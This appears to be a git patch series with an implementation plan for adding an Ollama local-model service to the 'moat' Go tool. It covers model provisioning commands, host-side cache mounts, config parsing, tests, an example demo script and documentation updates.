len(userSpec.Extra) > 0 { + // Service doesn't support provisions but user provided extra keys + for key := range userSpec.Extra { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid configuration key", + dep.Name, key, + ) + } + } + + // Resolve cache host path + var cacheHostPath string + if spec.Service.CachePath != "" { + homeDir, err := os.UserHomeDir() + if err != nil { + return container.ServiceConfig{}, fmt.Errorf("resolving home directory for cache: %w", err) + } + cacheHostPath = filepath.Join(homeDir, ".moat", "cache", dep.Name) + } + + return container.ServiceConfig{ + Name: dep.Name, + Version: dep.Version, + Env: env, + RunID: runID, + Image: spec.Service.Image, + Ports: spec.Service.Ports, + PasswordEnv: spec.Service.PasswordEnv, + ExtraCmd: spec.Service.ExtraCmd, + ReadinessCmd: spec.Service.ReadinessCmd, + CachePath: spec.Service.CachePath, + CacheHostPath: cacheHostPath, + Provisions: provisions, + ProvisionCmd: spec.Service.ProvisionCmd, + }, nil +} +``` + +Add `"os"` and `"path/filepath"` to the imports in `services.go`. 
+ +- [ ] **Step 4: Run tests to verify they pass** + +Run: `go test ./internal/run/ -run "TestBuildServiceConfigOllama|TestBuildServiceConfigNoPassword|TestBuildServiceConfigPostgresStillHas|TestBuildServiceConfigValidatesProvisionsKey" -v` +Expected: PASS + +- [ ] **Step 5: Run all run package tests** + +Run: `go test ./internal/run/ -v -count=1` +Expected: All PASS (existing postgres/redis/mysql tests must still pass) + +- [ ] **Step 6: Commit** + +```bash +git add internal/run/services.go internal/run/services_test.go +git commit -m "feat(run): wire provisions, cache, and password guard into buildServiceConfig" +``` + +--- + +### Task 6: Add provisionService function and wire into manager + +**Files:** +- Modify: `internal/run/services.go` (add provisionService) +- Modify: `internal/run/services_test.go` (add tests) +- Modify: `internal/run/manager.go:1922-1948` (wire provisioning after readiness) + +- [ ] **Step 1: Write failing test for provisionService** + +Add to `internal/run/services_test.go`: + +```go +func TestProvisionServiceBuildsCommands(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) + assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) +} + +func TestProvisionServiceEmptyList(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", nil) + assert.Empty(t, cmds) +} + +func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "plugins": {"pg_trgm"}, + }, + } + + _, err := buildServiceConfig(dep, "run-pg", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "plugins") + assert.Contains(t, err.Error(), "not a valid") +} +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `go test ./internal/run/ -run "TestProvisionService" -v` +Expected: 
FAIL — `buildProvisionCmds` doesn't exist

- [ ] **Step 3: Implement provisionService and buildProvisionCmds**

Add to `internal/run/services.go`:

```go
const provisionTimeout = 30 * time.Minute

// buildProvisionCmds creates concrete commands from a template and item list.
func buildProvisionCmds(cmdTemplate string, items []string) []string {
	if len(items) == 0 {
		return nil
	}
	cmds := make([]string, len(items))
	for i, item := range items {
		cmds[i] = strings.ReplaceAll(cmdTemplate, "{item}", item)
	}
	return cmds
}

// provisionService runs provision commands inside a started service container.
// Uses flock-based advisory locking on the cache directory to prevent concurrent
// corruption from parallel runs.
func provisionService(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cfg container.ServiceConfig, stdout io.Writer) error {
	cmds := buildProvisionCmds(cfg.ProvisionCmd, cfg.Provisions)
	if len(cmds) == 0 {
		return nil
	}

	ctx, cancel := context.WithTimeout(ctx, provisionTimeout)
	defer cancel()

	// Advisory lock on cache directory to prevent concurrent pull corruption.
	// Cache directory is already created by the manager before starting the sidecar.
	if cfg.CacheHostPath != "" {
		lockPath := filepath.Join(cfg.CacheHostPath, ".lock")
		lockFile, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644)
		if err != nil {
			return fmt.Errorf("opening cache lock %s: %w", lockPath, err)
		}
		defer lockFile.Close()
		if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil {
			return fmt.Errorf("acquiring cache lock: %w", err)
		}
		defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }()
	}

	return mgr.ProvisionService(ctx, info, cmds, stdout)
}
```

Add `"io"`, `"syscall"`, and `"time"` to the imports (and `"context"` if not already present — `"os"` and `"path/filepath"` were added in Task 5). 
+ +- [ ] **Step 4: Run tests to verify they pass** + +Run: `go test ./internal/run/ -run "TestProvisionService" -v` +Expected: PASS + +- [ ] **Step 5: Wire provisioning into manager.go** + +In `internal/run/manager.go`, in the "Wait for readiness" loop (around line 1922-1948), add provisioning after the `waitForServiceReady` call. The modified loop should look like: + +```go + // Wait for readiness and provision + for i, dep := range serviceDeps { + wait := true + if opts.Config != nil { + if s, ok := opts.Config.Services[dep.Name]; ok { + wait = s.ServiceWait() + } + } + if !wait { + continue + } + + info := serviceInfos[i] + log.Debug("waiting for service to be ready", "service", dep.Name) + if err := waitForServiceReady(ctx, svcMgr, info); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s service failed to become ready: %w\n\n"+ + "Service container logs:\n moat logs %s --service %s\n\n"+ + "Or disable wait:\n services:\n %s:\n wait: false", + dep.Name, err, r.ID, dep.Name, dep.Name) + } + + // Provision items (e.g., pull models) if configured + if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) + if err := provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s service provisioning failed: %w\n\n"+ + "Service container logs:\n moat logs %s --service %s", + dep.Name, err, r.ID, dep.Name) + } + } + } +``` + +**Important:** The manager needs to store `ServiceConfig` values to access them in the readiness loop. 
In the "Start services" loop (around line 1888), save `svcCfg` into a slice: + +Before the loop, add: +```go + var svcConfigs []container.ServiceConfig +``` + +Inside the loop, after `svcCfg, err := buildServiceConfig(...)`, add: +```go + svcConfigs = append(svcConfigs, svcCfg) +``` + +Also, before starting the sidecar, create the cache directory: +```go + // Create cache directory if needed + if svcCfg.CacheHostPath != "" { + if err := os.MkdirAll(svcCfg.CacheHostPath, 0o755); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating cache directory for %s: %w", dep.Name, err) + } + } +``` + +- [ ] **Step 6: Verify compilation** + +Run: `go build ./...` +Expected: Success + +- [ ] **Step 7: Run all tests** + +Run: `go test ./internal/run/ -v -count=1` +Expected: All PASS + +- [ ] **Step 8: Commit** + +```bash +git add internal/run/services.go internal/run/services_test.go internal/run/manager.go +git commit -m "feat(run): add service provisioning with flock-based cache locking" +``` + +--- + +## Chunk 3: Env generation fix, example, and documentation + +### Task 7: Fix generateServiceEnv for no-auth services + +**Files:** +- Modify: `internal/run/services.go` (generateServiceEnv) +- Modify: `internal/run/services_test.go` (add test) + +- [ ] **Step 1: Write failing test** + +Add to `internal/run/services_test.go`: + +```go +func TestGenerateServiceEnvOllama(t *testing.T) { + spec, ok := deps.GetSpec("ollama") + require.True(t, ok) + + info := container.ServiceInfo{ + Name: "ollama", + Host: "ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + } + + env := generateServiceEnv(spec.Service, info, nil) + + assert.Equal(t, "ollama", env["MOAT_OLLAMA_HOST"]) + assert.Equal(t, "11434", env["MOAT_OLLAMA_PORT"]) + assert.Equal(t, "http://ollama:11434", env["MOAT_OLLAMA_URL"]) + + // No 
auth — should not have password, user, or db + _, hasPassword := env["MOAT_OLLAMA_PASSWORD"] + assert.False(t, hasPassword, "should not inject password for no-auth services") + _, hasUser := env["MOAT_OLLAMA_USER"] + assert.False(t, hasUser) + _, hasDB := env["MOAT_OLLAMA_DB"] + assert.False(t, hasDB) +} +``` + +- [ ] **Step 2: Run test to verify it passes (or fails)** + +Run: `go test ./internal/run/ -run TestGenerateServiceEnvOllama -v` +Expected: This test should PASS with the current `generateServiceEnv` code since the env map is empty and `PasswordEnv` is empty. The `password` fallback (`info.Env["password"]`) returns empty string, so `MOAT_OLLAMA_PASSWORD` won't be set. If it fails, the password guard in Task 5 already fixed the upstream issue. Verify and move on. + +- [ ] **Step 3: Run all run tests** + +Run: `go test ./internal/run/ -v -count=1` +Expected: All PASS + +- [ ] **Step 4: Commit** + +```bash +git add internal/run/services_test.go +git commit -m "test(run): add env generation test for Ollama no-auth service" +``` + +--- + +### Task 8: Add example + +**Files:** +- Create: `examples/service-ollama/moat.yaml` +- Create: `examples/service-ollama/demo.sh` + +- [ ] **Step 1: Create example moat.yaml** + +Create `examples/service-ollama/moat.yaml`: + +```yaml +# Example: Ollama service dependency +# +# Demonstrates local model inference using Ollama as a service dependency. +# Moat starts an Ollama sidecar, pulls the declared model, and injects +# MOAT_OLLAMA_* environment variables into the agent container. +# +# Run with: +# moat run examples/service-ollama +# +# The demo script queries the Ollama API to list models and generate a response. 
+ 

name: service-ollama

dependencies:
  - ollama@0.9
  - curl

services:
  ollama:
    models:
      - qwen2.5-coder:1.5b

command: ["sh", "/workspace/demo.sh"]
```

- [ ] **Step 2: Create demo script**

Create `examples/service-ollama/demo.sh`:

```bash
#!/bin/sh
set -e

echo "=== Ollama Service Demo ==="
echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL"
echo

echo "--- Available models ---"
curl -s "$MOAT_OLLAMA_URL/api/tags" | head -c 200
echo
echo

echo "--- Generating response ---"
curl -s "$MOAT_OLLAMA_URL/api/generate" \
  -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \
  | head -c 500
echo
```

- [ ] **Step 3: Commit**

```bash
git add examples/service-ollama/
git commit -m "docs(examples): add Ollama service dependency example"
```

---

### Task 9: Update documentation

**Files:**
- Modify: `docs/content/guides/08-services.md`
- Modify: `docs/content/reference/06-dependencies.md`
- Modify: `docs/content/reference/02-moat-yaml.md`

- [ ] **Step 1: Add Ollama to services guide**

In `docs/content/guides/08-services.md`, add an Ollama section after the "Readiness checks" table:

```markdown
### Ollama (local models)

Ollama provides local model inference without external API keys:

\`\`\`yaml
dependencies:
  - ollama@0.9

services:
  ollama:
    models:
      - qwen2.5-coder:7b
      - nomic-embed-text
\`\`\`

Models are pulled during startup and cached at `~/.moat/cache/ollama/` on the host. Subsequent runs skip the download. 
+ +\`\`\`python +import requests +import os + +url = os.environ["MOAT_OLLAMA_URL"] +resp = requests.post(f"{url}/api/generate", json={ + "model": "qwen2.5-coder:7b", + "prompt": "Write hello world in Go", + "stream": False, +}) +print(resp.json()["response"]) +\`\`\` +``` + +Add Ollama to the readiness table: + +``` +| `ollama` | `ollama list` + pull declared models | +``` + +- [ ] **Step 2: Add Ollama to the dependencies reference** + +In `docs/content/reference/06-dependencies.md`, add ollama to the services section of the dependency registry table. + +- [ ] **Step 3: Document provisions pattern in moat.yaml reference** + +In `docs/content/reference/02-moat-yaml.md`, in the `services:` section, add documentation for the provisions pattern (list-valued keys like `models`). + +- [ ] **Step 4: Commit** + +```bash +git add docs/content/guides/08-services.md docs/content/reference/06-dependencies.md docs/content/reference/02-moat-yaml.md +git commit -m "docs: add Ollama service documentation and provisions pattern" +``` + +--- + +### Task 10: Lint and final verification + +- [ ] **Step 1: Run linter** + +Run: `make lint` +Expected: No errors. Fix any issues. 
+ +- [ ] **Step 2: Run all unit tests** + +Run: `make test-unit` +Expected: All PASS + +- [ ] **Step 3: Build** + +Run: `go build ./...` +Expected: Success + +- [ ] **Step 4: Final commit if lint fixes needed** + +```bash +git add -A +git commit -m "style: fix lint issues" +``` From c635491f9e2bfbcd6c7c5c7331fe5357a4a28366 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:30:47 +0000 Subject: [PATCH 02/27] feat(container): add provision and cache fields to ServiceConfig --- internal/container/runtime.go | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/internal/container/runtime.go b/internal/container/runtime.go index 9cb44d3b..aa21fd89 100644 --- a/internal/container/runtime.go +++ b/internal/container/runtime.go @@ -218,6 +218,15 @@ type ServiceConfig struct { PasswordEnv string // Env var containing the password (e.g., "POSTGRES_PASSWORD") ExtraCmd []string // Extra command args with {placeholder} substitution ReadinessCmd string // Command to check if service is ready + + // CachePath is the container-side path for cache mounting (e.g., "/root/.ollama"). + CachePath string + // CacheHostPath is the resolved host-side path (e.g., "~/.moat/cache/ollama/"). + CacheHostPath string + // Provisions is the list of items to provision (e.g., model names). + Provisions []string + // ProvisionCmd is the command template with {item} placeholder. + ProvisionCmd string } // ServiceInfo contains connection details for a started service. From 53b27e7a1a3d9c33163c06f1b8128a1736db06d6 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:31:26 +0000 Subject: [PATCH 03/27] feat(deps): add ollama service and provision/cache fields to ServiceDef Add CachePath, ProvisionsKey, and ProvisionCmd fields to ServiceDef struct to support services that need host-side caching and post-start provisioning. Add ollama as a service dependency using these new fields. 
--- internal/deps/registry.yaml | 16 ++++++++++++++++ internal/deps/registry_test.go | 20 ++++++++++++++++++++ internal/deps/types.go | 14 ++++++++++++++ 3 files changed, 50 insertions(+) diff --git a/internal/deps/registry.yaml b/internal/deps/registry.yaml index 687ae866..da37a23c 100644 --- a/internal/deps/registry.yaml +++ b/internal/deps/registry.yaml @@ -489,6 +489,22 @@ redis: url_scheme: "redis" url_format: "{scheme}://:{password}@{host}:{port}" +ollama: + description: Ollama local model server + type: service + default: "0.9" + service: + image: ollama/ollama + ports: + default: 11434 + env_prefix: OLLAMA + readiness_cmd: "ollama list" + url_scheme: "http" + url_format: "{scheme}://{host}:{port}" + cache_path: /root/.ollama + provisions_key: models + provision_cmd: "ollama pull {item}" + # Meta dependencies (bundles) go-extras: description: Common Go development tools (gofumpt, govulncheck, goreleaser) diff --git a/internal/deps/registry_test.go b/internal/deps/registry_test.go index 54d99fd1..e07c98d8 100644 --- a/internal/deps/registry_test.go +++ b/internal/deps/registry_test.go @@ -58,6 +58,26 @@ func TestRegistryHasPlaywright(t *testing.T) { } } +func TestRegistryHasOllama(t *testing.T) { + ollama, ok := GetSpec("ollama") + if !ok { + t.Fatal("Registry should have 'ollama'") + } + if ollama.Type != TypeService { + t.Errorf("ollama.Type = %v, want %v", ollama.Type, TypeService) + } + if ollama.Service == nil { + t.Fatal("ollama.Service should not be nil") + } + assert.Equal(t, "ollama/ollama", ollama.Service.Image) + assert.Equal(t, 11434, ollama.Service.Ports["default"]) + assert.Equal(t, "OLLAMA", ollama.Service.EnvPrefix) + assert.Equal(t, "/root/.ollama", ollama.Service.CachePath) + assert.Equal(t, "models", ollama.Service.ProvisionsKey) + assert.Equal(t, "ollama pull {item}", ollama.Service.ProvisionCmd) + assert.Empty(t, ollama.Service.PasswordEnv) +} + func TestServiceDepSpec(t *testing.T) { spec, ok := GetSpec("postgres") require.True(t, ok) 
diff --git a/internal/deps/types.go b/internal/deps/types.go index cd1cda1a..3d7f4874 100644 --- a/internal/deps/types.go +++ b/internal/deps/types.go @@ -116,6 +116,20 @@ type ServiceDef struct { ReadinessCmd string `yaml:"readiness_cmd"` URLScheme string `yaml:"url_scheme"` URLFormat string `yaml:"url_format"` + + // CachePath is the container-side path to mount for host-side caching. + // If set, ~/.moat/cache// is bind-mounted here. + // This allows data to persist across runs (e.g., downloaded models). + CachePath string `yaml:"cache_path,omitempty"` + + // ProvisionsKey names the key in user's services. config that contains + // a list of items to provision (e.g., "models"). Used with ProvisionCmd. + ProvisionsKey string `yaml:"provisions_key,omitempty"` + + // ProvisionCmd is a command template executed once per provision item. + // The placeholder {item} is replaced with each item value. + // Commands run via sh -c inside the service container after readiness. + ProvisionCmd string `yaml:"provision_cmd,omitempty"` } // Dependency represents a parsed dependency from moat.yaml. From 9a8f23e4bbda453f67db93d2f55339016e467ae0 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:33:23 +0000 Subject: [PATCH 04/27] feat(config): add Extra field to ServiceSpec for provision lists --- internal/config/config.go | 38 ++++++++++++++++++++++ internal/config/config_test.go | 58 ++++++++++++++++++++++++++++++++++ 2 files changed, 96 insertions(+) diff --git a/internal/config/config.go b/internal/config/config.go index 43ee631f..73e655a6 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -152,6 +152,44 @@ type ServiceSpec struct { Env map[string]string `yaml:"env,omitempty"` Image string `yaml:"image,omitempty"` Wait *bool `yaml:"wait,omitempty"` + // Extra holds unknown list-valued keys (e.g., "models" for ollama). + // Populated by UnmarshalYAML. The run layer maps these to provisions + // using the registry's provisions_key. 
+ Extra map[string][]string `yaml:"-"` +} + +// UnmarshalYAML implements custom unmarshaling to capture unknown list-valued keys +// into Extra. Known keys (env, image, wait) are parsed normally. +func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { + // First, decode known fields using an alias to avoid recursion. + type plain ServiceSpec + if err := value.Decode((*plain)(s)); err != nil { + return err + } + + // Then scan for unknown keys that have sequence values. + if value.Kind != yaml.MappingNode { + return nil + } + known := map[string]bool{"env": true, "image": true, "wait": true} + for i := 0; i+1 < len(value.Content); i += 2 { + key := value.Content[i].Value + val := value.Content[i+1] + if known[key] { + continue + } + if val.Kind == yaml.SequenceNode { + items := make([]string, 0, len(val.Content)) + for _, item := range val.Content { + items = append(items, item.Value) + } + if s.Extra == nil { + s.Extra = make(map[string][]string) + } + s.Extra[key] = items + } + } + return nil } // ServiceWait returns whether to wait for this service to be ready (default: true). 
diff --git a/internal/config/config_test.go b/internal/config/config_test.go index ebcb6fd9..8140b90b 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -5,6 +5,10 @@ import ( "path/filepath" "strings" "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "gopkg.in/yaml.v3" ) func TestLoadConfig(t *testing.T) { @@ -2278,3 +2282,57 @@ agent: claude-code } }) } + +func TestServiceSpecUnmarshalWithExtra(t *testing.T) { + input := ` +env: + FOO: bar +wait: false +models: + - qwen2.5-coder:7b + - nomic-embed-text +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "bar", spec.Env["FOO"]) + assert.False(t, spec.ServiceWait()) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, spec.Extra["models"]) +} + +func TestServiceSpecUnmarshalNoExtra(t *testing.T) { + input := ` +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) + assert.Empty(t, spec.Extra) +} + +func TestServiceSpecUnmarshalPreservesImage(t *testing.T) { + input := ` +image: custom-postgres:17 +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "custom-postgres:17", spec.Image) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) +} + +func TestServiceSpecUnmarshalEmptyExtra(t *testing.T) { + input := ` +env: + FOO: bar +models: [] +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Empty(t, spec.Extra["models"]) +} From 137e3d55fe65a749f97bbe6499d2593d1946257b Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:33:50 +0000 Subject: [PATCH 05/27] feat(container): add ProvisionService to ServiceManager interface and cache mount support Adds ProvisionService method to ServiceManager 
interface for executing provisioning commands inside service containers (e.g., pulling Ollama models). Also adds CachePath/CacheHostPath mount support to both Docker and Apple service managers so model/data caches can be persisted on the host. --- internal/container/apple_service.go | 19 +++++++++++ internal/container/apple_service_test.go | 22 +++++++++++++ internal/container/docker_service.go | 39 +++++++++++++++++++++++ internal/container/docker_service_test.go | 36 +++++++++++++++++++++ internal/container/runtime.go | 5 +++ 5 files changed, 121 insertions(+) diff --git a/internal/container/apple_service.go b/internal/container/apple_service.go index e2f3ace5..b92d5e0a 100644 --- a/internal/container/apple_service.go +++ b/internal/container/apple_service.go @@ -4,6 +4,7 @@ import ( "context" "encoding/json" "fmt" + "io" "os/exec" "sort" "strings" @@ -90,6 +91,19 @@ func (m *appleServiceManager) StopService(ctx context.Context, info ServiceInfo) return nil } +// ProvisionService executes commands sequentially inside the service container. +func (m *appleServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCmd := exec.CommandContext(ctx, m.containerBin, "exec", info.ID, "sh", "-c", cmd) + execCmd.Stdout = stdout + execCmd.Stderr = stdout + if err := execCmd.Run(); err != nil { + return fmt.Errorf("provision command %q failed: %w", cmd, err) + } + } + return nil +} + // getContainerIP inspects a container and returns its IPv4 address on the network. 
func (m *appleServiceManager) getContainerIP(ctx context.Context, containerID string) (string, error) { cmd := exec.CommandContext(ctx, m.containerBin, "inspect", containerID) @@ -139,6 +153,11 @@ func buildAppleRunArgs(cfg ServiceConfig, networkID string) []string { args = append(args, "--network", networkID) } + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + args = append(args, "--volume", cfg.CacheHostPath+":"+cfg.CachePath) + } + // Sort env keys for deterministic ordering envKeys := make([]string, 0, len(cfg.Env)) for k := range cfg.Env { diff --git a/internal/container/apple_service_test.go b/internal/container/apple_service_test.go index 8ade5c3f..5d91bcb8 100644 --- a/internal/container/apple_service_test.go +++ b/internal/container/apple_service_test.go @@ -114,3 +114,25 @@ func TestGetContainerIPExists(t *testing.T) { // Expected to fail — we just verify the method exists and returns an error assert.Error(t, err) } + +func TestAppleBuildRunArgsWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + args := buildAppleRunArgs(cfg, "moat-test-net") + assert.Contains(t, args, "--volume") + for i, a := range args { + if a == "--volume" && i+1 < len(args) { + assert.Equal(t, "/tmp/test-cache/ollama:/root/.ollama", args[i+1]) + return + } + } + t.Fatal("--volume flag not found in args") +} diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index 60280b78..9e3516d9 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -8,6 +8,7 @@ import ( dockercontainer "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" ) // dockerServiceManager implements ServiceManager using Docker sidecars. 
@@ -81,6 +82,36 @@ func (m *dockerServiceManager) StopService(ctx context.Context, info ServiceInfo return m.cli.ContainerRemove(ctx, info.ID, dockercontainer.RemoveOptions{Force: true}) } +// ProvisionService executes commands sequentially inside the service container. +func (m *dockerServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCreateResp, err := m.cli.ContainerExecCreate(ctx, info.ID, dockercontainer.ExecOptions{ + Cmd: []string{"sh", "-c", cmd}, + AttachStdout: true, + AttachStderr: true, + }) + if err != nil { + return fmt.Errorf("creating exec for provision command %q: %w", cmd, err) + } + + resp, err := m.cli.ContainerExecAttach(ctx, execCreateResp.ID, dockercontainer.ExecAttachOptions{}) + if err != nil { + return fmt.Errorf("attaching to provision command %q: %w", cmd, err) + } + _, _ = stdcopy.StdCopy(stdout, stdout, resp.Reader) + resp.Close() + + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + } + if execInspect.ExitCode != 0 { + return fmt.Errorf("provision command %q failed with exit code %d", cmd, execInspect.ExitCode) + } + } + return nil +} + // buildSidecarConfig converts a ServiceConfig into a SidecarConfig. 
func buildSidecarConfig(cfg ServiceConfig, networkID string) SidecarConfig { image := cfg.Image + ":" + cfg.Version @@ -109,6 +140,14 @@ func buildSidecarConfig(cfg ServiceConfig, networkID string) SidecarConfig { }, } + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + sc.Mounts = append(sc.Mounts, MountConfig{ + Source: cfg.CacheHostPath, + Target: cfg.CachePath, + }) + } + if len(cfg.ExtraCmd) > 0 { cmds := make([]string, len(cfg.ExtraCmd)) for i, c := range cfg.ExtraCmd { diff --git a/internal/container/docker_service_test.go b/internal/container/docker_service_test.go index 345a3f43..b5eb478e 100644 --- a/internal/container/docker_service_test.go +++ b/internal/container/docker_service_test.go @@ -4,6 +4,7 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" ) func TestBuildSidecarConfigPostgres(t *testing.T) { @@ -41,3 +42,38 @@ func TestBuildSidecarConfigRedis(t *testing.T) { assert.Equal(t, "redis:7", sidecarCfg.Image) assert.Equal(t, []string{"--requirepass", "redispass"}, sidecarCfg.Cmd) } + +func TestBuildSidecarConfigWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-789") + assert.Equal(t, "ollama/ollama:0.9", sidecarCfg.Image) + assert.Equal(t, "moat-ollama-test-run-789", sidecarCfg.Name) + + require.Len(t, sidecarCfg.Mounts, 1) + assert.Equal(t, "/tmp/test-cache/ollama", sidecarCfg.Mounts[0].Source) + assert.Equal(t, "/root/.ollama", sidecarCfg.Mounts[0].Target) + assert.False(t, sidecarCfg.Mounts[0].ReadOnly) +} + +func TestBuildSidecarConfigNoCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "postgres", + Version: "17", + Image: "postgres", + Env: map[string]string{}, + RunID: 
"test-run-000", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-000") + assert.Empty(t, sidecarCfg.Mounts) +} diff --git a/internal/container/runtime.go b/internal/container/runtime.go index aa21fd89..9337df93 100644 --- a/internal/container/runtime.go +++ b/internal/container/runtime.go @@ -203,6 +203,11 @@ type ServiceManager interface { CheckReady(ctx context.Context, info ServiceInfo) error StopService(ctx context.Context, info ServiceInfo) error SetNetworkID(id string) + + // ProvisionService executes commands sequentially inside the service container. + // Each command is run via sh -c. stdout receives streaming output for user feedback. + // Returns on first command failure (fail-fast). + ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error } // ServiceConfig defines what service to provision. From b841686b983b0dd524446002b841556a7b5c140d Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:36:35 +0000 Subject: [PATCH 06/27] feat(run): wire provisions, cache, and password guard into buildServiceConfig - Guard password generation: only generate for services that have auth (password_env set, or extra_cmd/readiness_cmd use {password} placeholder) - Wire provisions from userSpec.Extra using registry's provisions_key - Resolve cache host path to ~/.moat/cache/ - Validate unknown extra keys: reject keys that don't match provisions_key --- internal/run/services.go | 117 ++++++++++++++++++++++++++-------- internal/run/services_test.go | 83 ++++++++++++++++++++++++ 2 files changed, 175 insertions(+), 25 deletions(-) diff --git a/internal/run/services.go b/internal/run/services.go index 99ecb517..608305d3 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -5,6 +5,8 @@ import ( "crypto/rand" "fmt" "math/big" + "os" + "path/filepath" "strconv" "strings" "time" @@ -98,6 +100,21 @@ func generateServiceEnv(def *deps.ServiceDef, info container.ServiceInfo, userSp return env } +// 
serviceUsesPasswordPlaceholder reports whether a service's extra_cmd or +// readiness_cmd contains the {password} placeholder, indicating it needs a +// generated password even when password_env is empty (e.g., Redis). +func serviceUsesPasswordPlaceholder(svc *deps.ServiceDef) bool { + if strings.Contains(svc.ReadinessCmd, "{password}") { + return true + } + for _, arg := range svc.ExtraCmd { + if strings.Contains(arg, "{password}") { + return true + } + } + return false +} + // buildServiceConfig creates a ServiceConfig for a service dependency. // Populates both generic fields and service definition fields from the registry. func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.ServiceSpec) (container.ServiceConfig, error) { @@ -109,25 +126,37 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv return container.ServiceConfig{}, fmt.Errorf("%s has type %q but expected %q", dep.Name, spec.Type, deps.TypeService) } - password, err := generatePassword() - if err != nil { - return container.ServiceConfig{}, err - } - env := make(map[string]string) - // Set password - if spec.Service.PasswordEnv != "" { - env[spec.Service.PasswordEnv] = password - } else { - env["password"] = password - } + // Determine if this service needs a password. + // A service needs auth if it has a named password env var OR if its + // extra_cmd / readiness_cmd reference the {password} placeholder (e.g., Redis). 
